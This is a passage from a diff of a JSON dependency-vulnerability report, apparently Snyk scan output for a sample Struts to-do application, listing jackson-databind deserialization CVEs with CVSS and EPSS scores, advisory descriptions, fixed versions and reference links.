"vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.486075Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the `c3p0` libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.5, 2.8.11.1, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1931)\n", + "epssDetails": { + "percentile": "0.99133", + "probability": "0.93631", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-7489" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cggj-fvv3-cqwv" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-02-26T15:13:40.723000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11.1)", + "[2.9.0,2.9.5)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-02-10T15:13:40Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-02-26T15:13:40Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.486075Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.9.1", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2341", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/Al1ex/CVE-2019-12814", + "title": "PoC Repository" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:36.647712Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:50.077144Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:15.371549Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.647712Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:50.077144Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2341)\n- [PoC Repository](https://github.com/Al1ex/CVE-2019-12814)\n", + "epssDetails": { + "percentile": "0.87218", + "probability": "0.01539", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12814" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cmfg-87vq-g5g4" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-06-19T15:28:46.421239Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-06-19T14:34:16Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-06-19T14:34:16Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.077144Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "College of software Nankai University" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.9.9.1", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable when the feature Polymorphic Type Handling (PTH) is enabled." + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html", + "title": "Debian Security Announcement" + }, + { + "url": "https://github.com/jas502n/CVE-2019-12384", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", + "title": "Github Fix" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2334", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Jackson CVEs Don't Panic - Blog" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x", + "title": "Release Notes" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:36.645685Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:50.734463Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:45.683422Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.645685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:50.734463Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data which allows attackers to have a variety of impacts by leveraging failure to block the `logback-core` class from polymorphic deserialization. Depending on the `classpath` content, remote code execution may be possible.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [Debian Security Announcement](https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html)\n- [Exploit](https://github.com/jas502n/CVE-2019-12384)\n- [Github Fix](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2334)\n- [Jackson CVEs Don't Panic - Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Release Notes](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x)\n", + "epssDetails": { + "percentile": "0.97607", + "probability": "0.53288", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12384" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mph4-vhrx-mv67" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-06-25T10:06:54.889582Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-05-28T10:27:59Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-06-25T10:26:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.734463Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.9.2", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2387", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2389", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2395", + "title": "GitHub Issue" + }, + { + "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", + "title": "Snyk Blog" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:45.849047Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:54.502907Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.033731Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:45.849047Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.502907Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14439](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", + "epssDetails": { + "percentile": "0.83638", + "probability": "0.00984", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14379" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6fpp-rgj9-8rwc", + "GHSA-gwp4-hfv6-p7hw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-07-29T14:55:33.030000Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-07-29T12:40:42Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-07-29T12:40:42Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.502907Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.pr2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2449", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:54.800234Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:53.931793Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:42.808389Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:54.800234Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + 